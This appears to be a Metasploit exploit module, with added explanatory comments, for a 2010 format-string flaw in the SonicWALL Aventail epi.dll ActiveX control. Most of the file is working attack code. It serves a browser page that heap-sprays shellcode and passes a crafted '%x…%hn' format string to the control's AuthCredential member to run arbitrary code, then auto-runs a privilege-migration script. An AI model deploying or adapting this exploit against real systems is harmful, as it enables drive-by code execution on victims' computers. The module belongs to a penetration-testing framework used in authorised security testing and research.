##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser-side exploit module for the SonicWALL Aventail EPI ActiveX control
# (epi.dll). It is served through the HttpServer::HTML mixin: a visiting
# browser receives an HTML page that instantiates the control by CLSID and
# assigns a crafted Unicode format string to its 'AuthCredential' member.
#
# Reliability caveats are stated by the author in 'Description' and in the
# target definition: the single target's 'Write' address is documented as
# varying between executions, and the 'Notes' entries are all UNKNOWN_*.
# This module defines no `check` method of its own.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking # heap spray and address shifty

  include Msf::Exploit::Remote::HttpServer::HTML

  # Module metadata: name, description, references, payload constraints and
  # the single target (epi.dll v10.0.4.18 on Windows XP SP3).
  #
  # @param info [Hash] base module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SonicWALL Aventail epi.dll AuthCredential Format String',
        'Description' => %q{
          This module exploits a format string vulnerability within version 10.0.4.x and
          10.5.1 of the SonicWALL Aventail SSL-VPN Endpoint Interrogator/Installer ActiveX
          control (epi.dll). By calling the 'AuthCredential' method with a specially
          crafted Unicode format string, an attacker can cause memory corruption and
          execute arbitrary code.

          Unfortunately, it does not appear to be possible to indirectly re-use existing
          stack data for more reliable exploitation. This is due to several particulars
          about this vulnerability. First, the format string must be a Unicode string,
          which uses two bytes per character. Second, the buffer is allocated on the
          stack using the 'alloca' function. As such, each additional format specifier (%x)
          will add four more bytes to the size allocated. This results in the inability to
          move the read pointer outside of the buffer.

          Further testing showed that using specifiers that pop more than four bytes does
          not help. Any number of format specifiers will result in accessing the same value
          within the buffer.

          NOTE: It may be possible to leverage the vulnerability to leak memory contents.
          However, that has not been fully investigated at this time.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Nikolas Sotiriu', # original discovery / poc
          'jduck' # Metasploit module
        ],
        'References' => [
          [ 'OSVDB', '67286'],
          [ 'URL', 'http://sotiriu.de/adv/NSOADV-2010-005.txt' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Payload' => {
          # Payload must fit in 1024 bytes and contain no NUL bytes, since it
          # travels as a JavaScript-unescaped string (see on_request_uri).
          'Space' => 1024,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'epi.dll v10.0.4.18 on Windows XP SP3',
            {
              # NOTE: Unfortunately, this address varies from execution to execution
              'Write' => 0x1240000 + 0x501d4 + 2, # smashed high 16-bits of a vtable ptr :)
              # 0x1d5005c, # crashes on deref+call
              # 'Ret' doubles as the heap-spray filler value in on_request_uri.
              'Ret' => 0x04040404
            }
          ]
        ],
        'DisclosureDate' => '2010-08-19',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Always false: opts this module out of the framework's automatic module
  # selection (presumably because of the per-execution address variance noted
  # above — confirm against the framework's autofilter semantics).
  def autofilter
    false
  end

  # Dependency hook: delegates to use_zlib from the HttpServer mixin. What
  # use_zlib actually requires is defined in the mixin, not in this file.
  def check_dependencies
    use_zlib
  end

  # Builds the exploit page for one browser request and sends it.
  #
  # @param cli the client connection; passed to regenerate_payload,
  #   send_response_html and handler
  # @param request the HTTP request; not inspected by this method
  # @return [nil] returns early, sending nothing, when regenerate_payload
  #   yields nil
  def on_request_uri(cli, request)
    # CLSID instantiated by the <object> tag in the page below
    clsid = "2A1BE1E7-C550-4D67-A553-7F2D3A39233D"
    # ProgID of the same control; assigned for reference only, never used below
    progid = "Aventail.EPInterrogator.10.0.4.018"

    # Name of the vulnerable member that the script assigns to (twice)
    method = "AuthCredential"

    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Encode the shellcode as JavaScript unescape() input, in the target's
    # byte order
    shellcode = Rex::Text.to_unescape(p.encoded, Rex::Arch.endian(target.arch))

    # Setup exploit buffers: both are 32-bit little-endian values in the same
    # escaped form. 'nops' (target.ret) is the spray filler; 'write'
    # (target['Write']) is placed at the very start of the format string.
    nops = Rex::Text.to_unescape([target.ret].pack('V'))
    write = Rex::Text.to_unescape([target['Write']].pack('V'))

    # Setup format string offset
    # 'printed' is a constant the author measured for this target; it is not
    # derived from anything visible here. 'ret' becomes the field width of the
    # first '%x' in the script so that the count stored by the trailing '%hn'
    # is tied to the high 16 bits of target.ret.
    printed = 0xb1 - 5
    ret = (target.ret >> 16) - printed

    # Setup heap spray: each block is grown to 0x40000 bytes and 300 such
    # blocks are kept alive in an array by the script.
    blocksize = 0x40000
    fillto = 300

    # Randomize the javascript variable names
    # NOTE: the first three names are fixed literals — the randomizing calls
    # are commented out — so 'axobj', 'fmt' and 'i' appear verbatim in every
    # served page.
    axobj = "axobj" # rand_text_alpha(rand(100) + 1)
    j_format = "fmt" # rand_text_alpha(rand(100) + 1)
    j_counter = "i" # rand_text_alpha(rand(30) + 2)
    # heap spray vars (random alphabetic names, 1..100 characters each)
    j_shellcode = rand_text_alpha(rand(100) + 1)
    j_nops = rand_text_alpha(rand(100) + 1)
    j_ret = rand_text_alpha(rand(100) + 1)
    j_headersize = rand_text_alpha(rand(100) + 1)
    j_slackspace = rand_text_alpha(rand(100) + 1)
    j_fillblock = rand_text_alpha(rand(100) + 1)
    j_block = rand_text_alpha(rand(100) + 1)
    j_memory = rand_text_alpha(rand(100) + 1)

    # NOTE: the second assignment triggers the shellcode
    # (j_ret is generated above but never referenced in the page.)
    content = %Q|<html>
<object classid='clsid:#{clsid}' id='#{axobj}'></object>
<script>
#{j_shellcode}=unescape('#{shellcode}');
#{j_nops}=unescape('#{nops}');
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};

#{j_format} = unescape("#{write}");
#{j_format} += '%#{ret}x';
for (#{j_counter} = 0; #{j_counter} < 22; #{j_counter}++)
#{j_format} += '%x';
#{j_format} += '%hn';

#{axobj}.#{method} = #{j_format};
#{axobj}.#{method} = #{j_format};
</script>
</html>|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end